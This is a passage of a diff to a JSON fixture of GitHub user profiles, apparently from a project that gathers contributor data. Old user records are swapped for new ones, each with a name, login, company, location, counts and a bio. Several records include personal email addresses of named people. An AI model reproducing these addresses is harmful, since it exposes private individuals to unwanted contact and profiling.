"2024-09-12T01:41:46.964Z", - "name": "", - "login": "alptunga", + "nest_created_at": "2024-09-22T09:40:40.573Z", + "nest_updated_at": "2024-09-22T19:39:41.979Z", + "name": "Duane May", + "login": "duanemay", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10005432?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/991170?v=4", + "company": "@VMware", + "location": "Novi, MI", "collaborators_count": 0, - "following_count": 31, - "followers_count": 7, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2014-11-30T01:34:05Z", - "updated_at": "2024-08-22T21:05:51Z", - "node_id": "MDQ6VXNlcjEwMDA1NDMy", - "bio": "", + "following_count": 11, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 42, + "created_at": "2011-08-19T14:32:43Z", + "updated_at": "2024-09-17T18:33:00Z", + "node_id": "MDQ6VXNlcjk5MTE3MA==", + "bio": "Technical Lead for @vmware-tanzu", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2698, + "pk": 8054, "fields": { - "nest_created_at": "2024-09-12T01:41:47.837Z", - "nest_updated_at": "2024-09-18T19:07:13.063Z", - "name": "Christian", - "login": "nhouck", + "nest_created_at": "2024-09-22T09:40:40.886Z", + "nest_updated_at": "2024-09-22T19:42:02.957Z", + "name": "Rob Best", + "login": "ribbybibby", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10012235?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9870923?v=4", "company": "", - "location": "", + "location": "Manchester, UK", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2014-11-30T19:23:12Z", - "updated_at": "2023-04-05T22:12:16Z", - "node_id": "MDQ6VXNlcjEwMDEyMjM1", + "following_count": 5, + "followers_count": 28, + "public_gists_count": 1, + "public_repositories_count": 58, + "created_at": "2014-11-20T20:17:23Z", + "updated_at": "2024-08-28T13:33:48Z", + "node_id": "MDQ6VXNlcjk4NzA5MjM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427703,99 +687277,124 @@ }, { "model": "github.user", - "pk": 2699, + "pk": 8055, "fields": { - "nest_created_at": "2024-09-12T01:41:59.261Z", - "nest_updated_at": "2024-09-12T01:41:59.261Z", - "name": "Sergei Ovchinnikov", - "login": "malchikserega", - "email": "sergey.o.a@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/7830174?v=4", - "company": "Ingram Micro", - "location": "United States of America", + "nest_created_at": "2024-09-22T09:40:41.237Z", + "nest_updated_at": "2024-09-22T19:40:26.694Z", + "name": "Takuma Kume", + "login": "takumakume", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10905048?v=4", + "company": "@pepabo", + "location": "Japan", "collaborators_count": 0, - "following_count": 17, - "followers_count": 7, - "public_gists_count": 1, - "public_repositories_count": 8, - "created_at": "2014-06-08T12:28:03Z", - "updated_at": "2024-06-05T21:04:23Z", - "node_id": "MDQ6VXNlcjc4MzAxNzQ=", - "bio": "", + "following_count": 27, + "followers_count": 13, + "public_gists_count": 4, + "public_repositories_count": 162, + "created_at": "2015-02-08T05:44:07Z", + "updated_at": "2024-09-07T00:47:10Z", + "node_id": "MDQ6VXNlcjEwOTA1MDQ4", + "bio": "Senior Engineer\r\nCloudnative/SRE", "is_hireable": false, - "twitter_username": "malchikserega" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2700, + "pk": 8056, "fields": { - "nest_created_at": "2024-09-12T01:42:00.471Z", - "nest_updated_at": "2024-09-12T01:42:00.471Z", - "name": "", - "login": "guidola", + "nest_created_at": "2024-09-22T09:40:42.250Z", + "nest_updated_at": "2024-09-22T19:39:43.579Z", + "name": "Lucas Pape", + "login": "lpape-ionos", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11554611?v=4", - "company": "", - "location": "Barcelona", + "avatar_url": "https://avatars.githubusercontent.com/u/119574670?v=4", + "company": "@ionos-cloud", + "location": "Karlsruhe, Germany", "collaborators_count": 0, - "following_count": 2, - "followers_count": 5, + "following_count": 5, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-12-01T08:05:09Z", + "updated_at": "2024-08-21T14:51:42Z", + "node_id": "U_kgDOByCQjg", + "bio": "@lucasl0st ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8057, + "fields": { + "nest_created_at": "2024-09-22T09:40:42.629Z", + "nest_updated_at": "2024-09-22T19:39:43.896Z", + "name": "Marc Brugger", + "login": "bakito", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2733215?v=4", + "company": "Bison", + "location": "Zürich", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 58, "public_gists_count": 6, - "public_repositories_count": 14, - "created_at": "2015-03-19T10:48:38Z", - "updated_at": "2024-05-23T13:16:43Z", - "node_id": "MDQ6VXNlcjExNTU0NjEx", - "bio": "All things Architecture | Jack of all trades", + "public_repositories_count": 81, + "created_at": "2012-11-06T07:54:01Z", + "updated_at": "2024-09-09T11:27:42Z", + "node_id": "MDQ6VXNlcjI3MzMyMTU=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2701, + "pk": 8058, "fields": { - "nest_created_at": "2024-09-12T01:42:08.466Z", - "nest_updated_at": "2024-09-12T01:42:08.466Z", - "name": "Dipak Kumar Das", - "login": "d1pakda5", - "email": "deepakdas288@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/17035598?v=4", - "company": "", - "location": "Bangalore", + "nest_created_at": "2024-09-22T09:40:43.263Z", + "nest_updated_at": "2024-09-22T19:39:44.532Z", + "name": "Mohamed Chiheb Ben Jemaa", + "login": "mcbenjemaa", + "email": "mc.benjemaa@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/15221272?v=4", + "company": "@ionos-cloud", + "location": "Berlin", "collaborators_count": 0, - "following_count": 100, - "followers_count": 39, - "public_gists_count": 26, - "public_repositories_count": 474, - "created_at": "2016-02-02T23:17:07Z", - "updated_at": "2024-08-22T11:40:47Z", - "node_id": "MDQ6VXNlcjE3MDM1NTk4", - "bio": "\r\n Senior Penetration Tester | Bug Bounty Hunter |\r\n\r\n\r\nHackerone: https://hackerone.com/d1pakda5\r\n", + "following_count": 24, + "followers_count": 54, + "public_gists_count": 4, + "public_repositories_count": 111, + "created_at": "2015-10-20T21:22:28Z", + "updated_at": "2024-08-02T07:30:10Z", + "node_id": "MDQ6VXNlcjE1MjIxMjcy", + "bio": "Platform Engineer / Kubernetes", "is_hireable": true, - "twitter_username": "d1pakdas" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2702, + "pk": 8059, "fields": { - "nest_created_at": "2024-09-12T01:42:17.775Z", - "nest_updated_at": "2024-09-12T01:42:17.775Z", - "name": "Curtis Ruck", - "login": "ruckc", + "nest_created_at": "2024-09-22T09:40:54.825Z", + "nest_updated_at": "2024-09-22T19:42:19.201Z", + "name": "", + "login": "rbt-mm", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1426401?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/113189967?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 48, - "followers_count": 10, - "public_gists_count": 14, - "public_repositories_count": 129, - "created_at": "2012-02-10T13:52:17Z", - "updated_at": "2024-08-15T11:19:00Z", - "node_id": "MDQ6VXNlcjE0MjY0MDE=", + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2022-09-09T13:49:41Z", + "updated_at": "2024-07-16T07:01:26Z", + "node_id": "U_kgDOBr8kTw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427803,74 +687402,74 @@ }, { "model": "github.user", - "pk": 2703, + "pk": 8060, "fields": { - "nest_created_at": "2024-09-12T01:42:22.441Z", - "nest_updated_at": "2024-09-12T01:42:22.441Z", - "name": "Vlad Fedosov", - "login": "StyleT", - "email": "vlad.fedosov@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1125900?v=4", - "company": "@epam", - "location": "Charlotte, NC, USA", + "nest_created_at": "2024-09-22T09:40:55.470Z", + "nest_updated_at": "2024-09-22T19:41:53.902Z", + "name": "Ross Murphy", + "login": "2000rosser", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/77832827?v=4", + "company": "IBM", + "location": "Dublin, Ireland", "collaborators_count": 0, "following_count": 2, - "followers_count": 27, - "public_gists_count": 6, - "public_repositories_count": 61, - "created_at": "2011-10-13T15:08:48Z", - "updated_at": "2024-07-08T13:27:32Z", - "node_id": "MDQ6VXNlcjExMjU5MDA=", - "bio": "", + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2021-01-22T09:34:32Z", + "updated_at": "2024-08-23T16:11:41Z", + "node_id": "MDQ6VXNlcjc3ODMyODI3", + "bio": "Software Engineer", "is_hireable": false, - "twitter_username": "vladlen_fedosov" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2704, + "pk": 8061, "fields": { - "nest_created_at": "2024-09-12T01:42:23.704Z", - "nest_updated_at": "2024-09-12T01:42:23.704Z", - "name": "Ramón Rial", - "login": "rrialq", + "nest_created_at": "2024-09-22T09:40:58.985Z", + "nest_updated_at": "2024-09-22T19:40:03.800Z", + "name": "Mango The Fourth", + "login": "MangoIV", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7503681?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/40720523?v=4", "company": "", - "location": "Santiago de Compostela - La Coruña - Spain", + "location": "Leipzig, Germany", "collaborators_count": 0, - "following_count": 2, - "followers_count": 2, - "public_gists_count": 5, - "public_repositories_count": 40, - "created_at": "2014-05-06T18:15:27Z", - "updated_at": "2024-07-22T09:55:25Z", - "node_id": "MDQ6VXNlcjc1MDM2ODE=", - "bio": "", + "following_count": 83, + "followers_count": 88, + "public_gists_count": 11, + "public_repositories_count": 132, + "created_at": "2018-06-30T16:07:25Z", + "updated_at": "2024-09-03T14:10:45Z", + "node_id": "MDQ6VXNlcjQwNzIwNTIz", + "bio": "Haskell, Nix and other functional languages", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2705, + "pk": 8062, "fields": { - "nest_created_at": "2024-09-12T01:42:26.217Z", - "nest_updated_at": "2024-09-12T01:42:26.217Z", - "name": "", - "login": "wargamez", + "nest_created_at": "2024-09-22T09:41:02.466Z", + "nest_updated_at": "2024-09-22T19:42:34.553Z", + "name": "hborchardt", + "login": "hborchardt", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/76409?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/66408901?v=4", + "company": "scientific bioprocessing, Inc.", + "location": "Düsseldorf, Germany", "collaborators_count": 0, - "following_count": 5, - "followers_count": 11, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2009-04-22T06:30:50Z", - "updated_at": "2024-08-29T19:47:18Z", - "node_id": "MDQ6VXNlcjc2NDA5", + "public_repositories_count": 29, + "created_at": "2020-06-04T07:21:40Z", + "updated_at": "2024-07-18T15:46:39Z", + "node_id": "MDQ6VXNlcjY2NDA4OTAx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427878,24 +687477,24 @@ }, { "model": "github.user", - "pk": 2706, + "pk": 8063, "fields": { - "nest_created_at": "2024-09-12T01:42:27.431Z", - "nest_updated_at": "2024-09-12T01:42:27.431Z", - "name": "Clement Trung", - "login": "ctrung", + "nest_created_at": "2024-09-22T09:41:07.341Z", + "nest_updated_at": "2024-09-22T19:42:31.958Z", + "name": "Nathan Mittelette", + "login": "nathan-mittelette", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/68339?v=4", - "company": "", - "location": "Paris", + "avatar_url": "https://avatars.githubusercontent.com/u/52243730?v=4", + "company": "AXOPEN", + "location": "Villeurbane", "collaborators_count": 0, - "following_count": 2, + "following_count": 5, "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2009-03-29T12:19:26Z", - "updated_at": "2024-07-07T08:02:02Z", - "node_id": "MDQ6VXNlcjY4MzM5", + "public_repositories_count": 12, + "created_at": "2019-06-26T11:53:42Z", + "updated_at": "2024-09-01T06:28:30Z", + "node_id": "MDQ6VXNlcjUyMjQzNzMw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427903,24 +687502,24 @@ }, { "model": "github.user", - "pk": 2707, + "pk": 8064, "fields": { - "nest_created_at": "2024-09-12T01:42:28.731Z", - "nest_updated_at": "2024-09-12T01:42:30.437Z", + "nest_created_at": "2024-09-22T09:41:08.284Z", + "nest_updated_at": "2024-09-22T19:42:27.796Z", "name": "", - "login": "RazorTheBeaver", + "login": "awegg", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/102231206?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/49698105?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-03-23T12:39:31Z", - "updated_at": "2022-04-15T13:20:14Z", - "node_id": "U_kgDOBhfspg", + "public_repositories_count": 4, + "created_at": "2019-04-16T21:18:09Z", + "updated_at": "2024-08-14T19:28:35Z", + "node_id": "MDQ6VXNlcjQ5Njk4MTA1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427928,24 +687527,24 @@ }, { "model": "github.user", - "pk": 2708, + "pk": 8065, "fields": { - "nest_created_at": "2024-09-12T01:42:32.880Z", - "nest_updated_at": "2024-09-12T01:42:32.880Z", - "name": "Thomas Brüggemann", - "login": "bruegth", + "nest_created_at": "2024-09-22T09:41:09.246Z", + "nest_updated_at": "2024-09-22T19:42:01.323Z", + "name": "萧易客", + "login": "Shawyeok", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1318408?v=4", - "company": "@WH-GROUP ", - "location": "DE, Ibbenbüren", + "avatar_url": "https://avatars.githubusercontent.com/u/5058708?v=4", + "company": "", + "location": "Beijing, China", "collaborators_count": 0, - "following_count": 5, - "followers_count": 8, - "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2012-01-10T13:06:46Z", - "updated_at": "2024-07-30T14:17:24Z", - "node_id": "MDQ6VXNlcjEzMTg0MDg=", + "following_count": 58, + "followers_count": 26, + "public_gists_count": 6, + "public_repositories_count": 43, + "created_at": "2013-07-21T14:11:15Z", + "updated_at": "2024-06-21T08:11:16Z", + "node_id": "MDQ6VXNlcjUwNTg3MDg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427953,24 +687552,24 @@ }, { "model": "github.user", - "pk": 2709, + "pk": 8066, "fields": { - "nest_created_at": "2024-09-12T01:42:47.975Z", - "nest_updated_at": "2024-09-12T01:42:47.975Z", - "name": "Pedro Cordeiro", - "login": "PedroNCordeiro", - "email": "pncordeiro@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/4098136?v=4", + "nest_created_at": "2024-09-22T09:41:09.579Z", + "nest_updated_at": "2024-09-22T19:40:14.410Z", + "name": "", + "login": "rh0dy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/57041950?v=4", "company": "", - "location": "Leiria, Portugal", + "location": "", "collaborators_count": 0, - "following_count": 9, - "followers_count": 9, - "public_gists_count": 1, - "public_repositories_count": 3, - "created_at": "2013-04-08T23:29:40Z", - "updated_at": "2023-06-29T12:52:17Z", - "node_id": "MDQ6VXNlcjQwOTgxMzY=", + "following_count": 1, + "followers_count": 0, + "public_gists_count": 2, + "public_repositories_count": 13, + "created_at": "2019-10-26T15:44:39Z", + "updated_at": "2024-09-18T21:05:50Z", + "node_id": "MDQ6VXNlcjU3MDQxOTUw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427978,49 +687577,49 @@ }, { "model": "github.user", - "pk": 2710, + "pk": 8067, "fields": { - "nest_created_at": "2024-09-12T02:07:21.854Z", - "nest_updated_at": "2024-09-12T02:07:21.854Z", - "name": "lukas.zmoginas", - "login": "Lzmog", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38206220?v=4", + "nest_created_at": "2024-09-22T09:41:10.231Z", + "nest_updated_at": "2024-09-22T19:42:06.483Z", + "name": "", + "login": "ch8matt", + "email": "g.matthieu49@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/31405855?v=4", "company": "", - "location": "", + "location": "Angers, France", "collaborators_count": 0, - "following_count": 27, - "followers_count": 2, + "following_count": 3, + "followers_count": 57, "public_gists_count": 1, - "public_repositories_count": 20, - "created_at": "2018-04-09T07:59:11Z", - "updated_at": "2024-08-05T17:36:46Z", - "node_id": "MDQ6VXNlcjM4MjA2MjIw", + "public_repositories_count": 7, + "created_at": "2017-08-28T10:34:59Z", + "updated_at": "2024-09-17T11:38:32Z", + "node_id": "MDQ6VXNlcjMxNDA1ODU1", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2711, + "pk": 8068, "fields": { - "nest_created_at": "2024-09-12T02:07:27.909Z", - "nest_updated_at": "2024-09-12T02:09:53.969Z", - "name": "", - "login": "SeniorTest", + "nest_created_at": "2024-09-22T09:41:11.195Z", + "nest_updated_at": "2024-09-22T19:40:16.028Z", + "name": "Massimo Prencipe", + "login": "mprencipe", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/48356010?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1984733?v=4", "company": "", - "location": "", + "location": "Tampere, Finland", "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2019-03-08T13:21:26Z", - "updated_at": "2024-08-29T06:43:22Z", - "node_id": "MDQ6VXNlcjQ4MzU2MDEw", + "following_count": 3, + "followers_count": 12, + "public_gists_count": 1, + "public_repositories_count": 11, + "created_at": "2012-07-16T14:19:52Z", + "updated_at": "2024-07-31T08:39:43Z", + "node_id": "MDQ6VXNlcjE5ODQ3MzM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428028,24 +687627,24 @@ }, { "model": "github.user", - "pk": 2712, + "pk": 8069, "fields": { - "nest_created_at": "2024-09-12T02:07:33.237Z", - "nest_updated_at": "2024-09-12T02:07:33.237Z", - "name": "Harry Bekkema", - "login": "hbekkema", + "nest_created_at": "2024-09-22T09:41:11.820Z", + "nest_updated_at": "2024-09-22T19:42:01.988Z", + "name": "Liviu Daniel Mara", + "login": "ldmara", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/85261211?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/39153629?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 1, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-06-02T22:40:40Z", - "updated_at": "2024-07-24T15:45:58Z", - "node_id": "MDQ6VXNlcjg1MjYxMjEx", + "public_repositories_count": 3, + "created_at": "2018-05-10T08:56:46Z", + "updated_at": "2020-02-27T14:17:54Z", + "node_id": "MDQ6VXNlcjM5MTUzNjI5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428053,24 +687652,24 @@ }, { "model": "github.user", - "pk": 2713, + "pk": 8070, "fields": { - "nest_created_at": "2024-09-12T02:07:38.222Z", - "nest_updated_at": "2024-09-12T02:07:38.222Z", - "name": "Christoph Sievers", - "login": "ctophs", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/81007257?v=4", - "company": "@gulp2 at @union-investment", - "location": "", + "nest_created_at": "2024-09-22T09:41:12.153Z", + "nest_updated_at": "2024-09-22T19:40:16.967Z", + "name": "Jadyn", + "login": "jadyndev", + "email": "jadyn@jadyn.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/24417737?v=4", + "company": "Deutsche Bahn", + "location": "Germany", "collaborators_count": 0, - "following_count": 6, - "followers_count": 1, - "public_gists_count": 1, - "public_repositories_count": 8, - "created_at": "2021-03-20T07:14:21Z", - "updated_at": "2022-06-13T07:26:24Z", - "node_id": "MDQ6VXNlcjgxMDA3MjU3", + "following_count": 53, + "followers_count": 36, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2016-12-06T18:42:57Z", + "updated_at": "2024-09-13T15:05:16Z", + "node_id": "MDQ6VXNlcjI0NDE3NzM3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428078,24 +687677,24 @@ }, { "model": "github.user", - "pk": 2714, + "pk": 8071, "fields": { - "nest_created_at": "2024-09-12T02:07:49.647Z", - "nest_updated_at": "2024-09-12T02:07:49.647Z", - "name": "Serg", - "login": "frost9i", + "nest_created_at": "2024-09-22T09:41:13.093Z", + "nest_updated_at": "2024-09-22T19:41:51.637Z", + "name": "", + "login": "japurva1502", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/25299818?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/111765683?v=4", "company": "", - "location": "Ukraine", + "location": "", "collaborators_count": 0, - "following_count": 2, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2017-01-23T13:38:45Z", - "updated_at": "2024-07-01T08:25:31Z", - "node_id": "MDQ6VXNlcjI1Mjk5ODE4", + "public_repositories_count": 4, + "created_at": "2022-08-22T14:58:08Z", + "updated_at": "2023-11-15T23:07:55Z", + "node_id": "U_kgDOBqlosw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428103,149 +687702,124 @@ }, { "model": "github.user", - "pk": 2715, + "pk": 8072, "fields": { - "nest_created_at": "2024-09-12T02:07:52.606Z", - "nest_updated_at": "2024-09-12T02:07:53.828Z", - "name": "Stefan Hacker", - "login": "hacst", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/237537?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:41:13.405Z", + "nest_updated_at": "2024-09-22T19:42:04.562Z", + "name": "Stephan Strate", + "login": "stephan-strate", + "email": "hello@stephan.codes", + "avatar_url": "https://avatars.githubusercontent.com/u/19595615?v=4", + "company": "@PROSOZ", + "location": "Herten, Germany", "collaborators_count": 0, - "following_count": 6, - "followers_count": 59, - "public_gists_count": 16, - "public_repositories_count": 47, - "created_at": "2010-04-05T23:50:03Z", - "updated_at": "2024-08-18T06:13:21Z", - "node_id": "MDQ6VXNlcjIzNzUzNw==", - "bio": "", + "following_count": 34, + "followers_count": 13, + "public_gists_count": 1, + "public_repositories_count": 30, + "created_at": "2016-05-26T17:28:38Z", + "updated_at": "2024-09-12T16:53:57Z", + "node_id": "MDQ6VXNlcjE5NTk1NjE1", + "bio": "🌟 Passionate software-architect at @PROSOZ. Preferred programming language: Kotlin.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2716, + "pk": 8073, "fields": { - "nest_created_at": "2024-09-12T02:08:06.814Z", - "nest_updated_at": "2024-09-12T02:08:06.814Z", - "name": "Enora Germond", - "login": "Ehoky", + "nest_created_at": "2024-09-22T09:41:13.728Z", + "nest_updated_at": "2024-09-22T19:40:18.620Z", + "name": "Steffen Gebert", + "login": "StephenKing", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/103035625?v=4", - "company": "", - "location": "Paris", + "avatar_url": "https://avatars.githubusercontent.com/u/277561?v=4", + "company": "@emnify", + "location": "Würzburg, Germany", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2022-04-05T09:58:02Z", - "updated_at": "2024-08-23T12:48:12Z", - "node_id": "U_kgDOBiQy6Q", - "bio": "", + "following_count": 0, + "followers_count": 50, + "public_gists_count": 40, + "public_repositories_count": 124, + "created_at": "2010-05-15T08:21:45Z", + "updated_at": "2024-08-28T09:42:09Z", + "node_id": "MDQ6VXNlcjI3NzU2MQ==", + "bio": "Infrastructure dude at @emnify. Running mobile core networks on AWS.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2717, + "pk": 8074, "fields": { - "nest_created_at": "2024-09-12T02:08:08.058Z", - "nest_updated_at": "2024-09-12T02:08:08.058Z", - "name": "", - "login": "kittyandrew", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45767571?v=4", - "company": "Manifold", - "location": "Kyiv, Ukraine", + "nest_created_at": "2024-09-22T09:41:14.059Z", + "nest_updated_at": "2024-09-22T19:40:18.940Z", + "name": "Sergio Santiago", + "login": "sergioasantiago", + "email": "sergio.a.santiago@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/875058?v=4", + "company": "@freenowtech ", + "location": "Hamburg", "collaborators_count": 0, - "following_count": 9, - "followers_count": 6, - "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2018-12-10T17:08:56Z", - "updated_at": "2024-08-06T20:20:53Z", - "node_id": "MDQ6VXNlcjQ1NzY3NTcx", - "bio": "Aspiring programmer", + "following_count": 0, + "followers_count": 9, + "public_gists_count": 20, + "public_repositories_count": 16, + "created_at": "2011-06-25T10:17:13Z", + "updated_at": "2024-09-16T19:06:44Z", + "node_id": "MDQ6VXNlcjg3NTA1OA==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2718, - "fields": { - "nest_created_at": "2024-09-12T02:08:12.278Z", - "nest_updated_at": "2024-09-12T02:08:12.278Z", - "name": "Russ Michell", - "login": "phptek", - "email": "russ@theruss.com", - "avatar_url": "https://avatars.githubusercontent.com/u/478440?v=4", - "company": "Catalyst NZ", - "location": "Wellington, NZ", - "collaborators_count": 0, - "following_count": 7, - "followers_count": 27, - "public_gists_count": 37, - "public_repositories_count": 69, - "created_at": "2010-11-12T06:50:54Z", - "updated_at": "2024-05-22T21:59:46Z", - "node_id": "MDQ6VXNlcjQ3ODQ0MA==", - "bio": "Expat pom living in .nz since ages ago. Software Developer. Will work with #green and #bitcoin for beer.", - "is_hireable": true, - "twitter_username": "therussdotcom" - } -}, -{ - "model": "github.user", - "pk": 2719, + "pk": 8075, "fields": { - "nest_created_at": "2024-09-12T02:08:14.359Z", - "nest_updated_at": "2024-09-12T02:08:14.359Z", - "name": "", - "login": "dnsbelgium-tech-cms", + "nest_created_at": "2024-09-22T09:41:16.029Z", + "nest_updated_at": "2024-09-22T19:40:20.875Z", + "name": "Thomas Grininger", + "login": "RingoDev", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/135347282?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/64872080?v=4", "company": "", - "location": "", + "location": "Austria", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-06-02T14:26:44Z", - "updated_at": "2024-06-21T09:10:51Z", - "node_id": "U_kgDOCBE8Ug", - "bio": "", + "public_repositories_count": 47, + "created_at": "2020-05-05T22:14:32Z", + "updated_at": "2024-06-13T13:10:06Z", + "node_id": "MDQ6VXNlcjY0ODcyMDgw", + "bio": "\r\n \r\n Studying Business & Informatics @JKU_Linz\r\n\r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2720, + "pk": 8076, "fields": { - "nest_created_at": "2024-09-12T02:08:18.113Z", - "nest_updated_at": "2024-09-12T02:08:18.113Z", - "name": "Dominic Allemann", - "login": "otakuu", + "nest_created_at": "2024-09-22T09:41:16.349Z", + "nest_updated_at": "2024-09-22T19:40:21.252Z", + "name": "Philipp Nanz", + "login": "philippn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5182070?v=4", - "company": "GetYourGuide", - "location": "Solothurn, Switzerland", + "avatar_url": "https://avatars.githubusercontent.com/u/445105?v=4", + "company": "", + "location": "Bamberg, Germany", "collaborators_count": 0, - "following_count": 7, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2013-08-07T12:45:38Z", - "updated_at": "2024-07-13T08:23:45Z", - "node_id": "MDQ6VXNlcjUxODIwNzA=", + "following_count": 3, + "followers_count": 8, + "public_gists_count": 6, + "public_repositories_count": 14, + "created_at": "2010-10-19T08:07:51Z", + "updated_at": "2024-08-23T07:09:13Z", + "node_id": "MDQ6VXNlcjQ0NTEwNQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428253,24 +687827,24 @@ }, { "model": "github.user", - "pk": 2721, + "pk": 8077, "fields": { - "nest_created_at": "2024-09-12T02:08:20.673Z", - "nest_updated_at": "2024-09-12T02:08:20.673Z", + "nest_created_at": "2024-09-22T09:41:17.295Z", + "nest_updated_at": "2024-09-22T19:42:08.368Z", "name": "", - "login": "tnagel1", + "login": "AZenker", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/47357239?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/113696267?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2019-02-05T14:06:00Z", - "updated_at": "2024-07-01T13:09:00Z", - "node_id": "MDQ6VXNlcjQ3MzU3MjM5", + "public_repositories_count": 0, + "created_at": "2022-09-16T12:59:25Z", + "updated_at": "2024-05-13T12:14:49Z", + "node_id": "U_kgDOBsbeCw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428278,24 +687852,24 @@ }, { "model": "github.user", - "pk": 2722, + "pk": 8078, "fields": { - "nest_created_at": "2024-09-12T02:08:25.945Z", - "nest_updated_at": "2024-09-12T02:08:25.945Z", - "name": "Jerry Chen", - "login": "jerry153fish", - "email": "jerry153fish@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1586798?v=4", - "company": "@origin-energy", - "location": "Melbourne", + "nest_created_at": "2024-09-22T09:41:19.252Z", + "nest_updated_at": 